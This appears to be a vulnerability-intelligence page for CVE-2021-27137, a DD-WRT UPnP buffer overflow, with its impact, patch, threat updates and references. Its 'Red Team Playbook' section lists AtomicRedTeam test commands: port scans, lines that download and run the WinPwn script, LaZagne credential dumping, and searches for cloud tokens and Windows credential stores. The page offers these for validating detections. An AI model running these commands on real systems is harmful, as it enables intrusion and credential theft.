CVE-2021-27137
Overview
This vulnerability is a stack-based buffer overflow caused by the use of an unsafe strcpy operation within the UPnP handling code of DD-WRT's ssdp.c component. Specifically, the flaw exists in the ssdp_msearch function which processes M-SEARCH requests. The root cause is the lack of proper boundary checks when copying incoming data into a fixed-size internal buffer, affecting the UPnP feature of the router firmware.
Vulnerability Description
An issue was discovered in router/upnp/src/ssdp.c in DD-WRT before 45724. An unsafe strcpy in the UPnP handling functionality allows an unauthenticated remote attacker to send a request that would overflow an internal fixed buffer. Exploitation requires the DD-WRT user to enable UPnP (which is off by default, and only listens on internal interfaces by default). This occurs in ssdp_msearch (reachable by an M-SEARCH request).
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary code on the affected device by sending a specially crafted M-SEARCH request to the UPnP service. This requires that UPnP is enabled by the user and accessible on internal network interfaces. Successful exploitation can lead to full system compromise, allowing attackers to control the router, disrupt network services, or pivot to other devices within the network. No user interaction or credentials are required, increasing the risk in environments where UPnP is enabled.
Solution
Users should upgrade DD-WRT firmware to build 45724 or later, as this update includes a fix addressing the unsafe strcpy usage in the UPnP SSDP handling code. Details and the patch can be found in the DD-WRT changeset 45724 at https://svn.dd-wrt.com/changeset/45724. As a workaround, disabling UPnP on the router will mitigate exposure to this vulnerability until the firmware is updated.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the UPnP handling functionality of DD-WRT routers stems from an unsafe use of the strcpy function in the source code, specifically within the SSDP (Simple Service Discovery Protocol) implementation. This flaw allows for a buffer overflow condition when an unauthenticated remote attacker sends a specially crafted M-SEARCH request. The buffer overflow occurs because the internal fixed buffer does not adequately validate the size of the incoming data, leading to potential overwriting of adjacent memory. This issue is particularly critical as it can be exploited without requiring authentication, making it easier for attackers to target vulnerable devices.
Exploitation of this vulnerability typically requires the user to enable UPnP, which is not enabled by default and is configured to listen only on internal interfaces. However, if a user inadvertently activates UPnP, the device becomes susceptible to remote attacks. An attacker could leverage this vulnerability to execute arbitrary code on the router, potentially gaining control over the device. Once compromised, the attacker could manipulate network traffic, intercept sensitive information, or launch further attacks against devices connected to the same network. This scenario highlights the importance of user awareness regarding the implications of enabling UPnP and the risks associated with misconfigured network devices.
The real-world impact of this vulnerability can be significant, particularly for small to medium-sized businesses that rely on DD-WRT routers for network management. A successful exploitation could lead to unauthorized access to sensitive data, disruption of services, and potential financial losses. Additionally, the compromised router could serve as a launching pad for attacks against other systems within the network, thereby increasing the overall risk profile of the organization. The reputational damage resulting from a security breach can also have long-lasting effects, especially if customer data is involved or if the breach is publicly disclosed.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, it is crucial to regularly update the firmware of DD-WRT routers to the latest version, as patches often address known vulnerabilities. Network administrators should also disable UPnP unless absolutely necessary, as this reduces the attack surface significantly. Employing intrusion detection systems (IDS) can help monitor network traffic for suspicious activity, including unexpected M-SEARCH requests. Furthermore, conducting regular security assessments and vulnerability scans can assist in identifying potential weaknesses before they can be exploited by attackers.
In conclusion, the vulnerability in the UPnP handling functionality of DD-WRT routers presents a serious risk, particularly if users enable UPnP without understanding the implications. By recognizing the technical details of the flaw, potential attack vectors, and the associated business risks, organizations can take proactive steps to protect their networks. Implementing robust detection and mitigation strategies is essential to safeguard against exploitation and to maintain the integrity of networked systems. As the threat landscape continues to evolve, ongoing vigilance and education regarding cybersecurity best practices will be critical in defending against such vulnerabilities.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2021-27137, coinciding with its recent inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog. This formal recognition underscores the vulnerability’s elevated risk profile and signals increased attention from both defenders and potential adversaries. Although no new exploit techniques or ransomware associations have been observed, the vulnerability’s CVSS score adjustment to 8.1 and a rising EPSS score indicate a growing likelihood of exploitation attempts in operational environments. Our telemetry suggests that while exploitation remains contingent on UPnP being enabled—a configuration not enabled by default—the increased scanning and probing activity reflects adversaries’ heightened interest in targeting affected DD-WRT deployments. This shift necessitates a reassessment of the threat posture for organizations utilizing DD-WRT firmware with UPnP enabled, as the vulnerability’s exploitation potential has moved from theoretical to more imminent. Consequently, the overall threat level has escalated from low to high, warranting increased monitoring and prioritization within security operations.
Update 2 — August 05, 2026
CSURFACE threat intelligence has identified a marked escalation in scanning and probing activity targeting the DD-WRT UPnP vulnerability, accompanied by a substantial increase in the Exploit Prediction Scoring System (EPSS) score. This upward trend in telemetry suggests that adversaries are intensifying reconnaissance efforts, likely to identify vulnerable devices with UPnP enabled. Although no new exploit code or ransomware campaigns have been confirmed, the growing interest reflected in our sensors signals a shift from opportunistic to more deliberate targeting. This development elevates the immediacy of the threat, as attackers appear to be preparing for or actively seeking exploitation opportunities. Consequently, the risk posture for affected environments has increased, warranting heightened vigilance and prioritization in detection and response workflows.
Update 3 — August 20, 2026
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2021-27137, indicating that adversaries are incrementally intensifying their efforts to identify and potentially exploit vulnerable DD-WRT routers with UPnP enabled. While no new exploit code or ransomware campaigns have been observed, this subtle uptick in telemetry suggests a growing reconnaissance focus rather than opportunistic scanning. The persistence of this trend, coupled with the vulnerability’s high severity and presence in widely deployed firmware, elevates the likelihood that threat actors are preparing for targeted exploitation attempts. Consequently, the risk environment for affected networks has modestly increased, underscoring the need for continued monitoring and prioritization within detection frameworks to intercept early-stage intrusion activities.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Dd-Wrt | Dd-Wrt | All |
cpe:2.3:o:dd-wrt:dd-wrt:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
9 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-27137 |
| svn.dd-wrt.com |
GitHub CVE
|
https://svn.dd-wrt.com/changeset/45724 |
| ssd-disclosure.com |
GitHub CVE
|
https://ssd-disclosure.com/ssd-advisory-dd-wrt-upnp-buffer-overflow/ |
| securityaffairs.com |
GitHub CVE
|
https://securityaffairs.com/193290/uncategorized/iot-botnet-c0xmo-adds-competitor-killing-capability.html |
| bleepingcomputer.com |
GitHub CVE
|
https://www.bleepingcomputer.com/news/security/c0xmo-botnet-spreads-via-dd-wrt-router-flaw-kills-rival-malware/ |
| fortinet.com |
GitHub CVE
|
https://www.fortinet.com/blog/threat-research/inside-cross-platform-propagation-of-new-gafgyt-variant-c0xmo |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-27137 |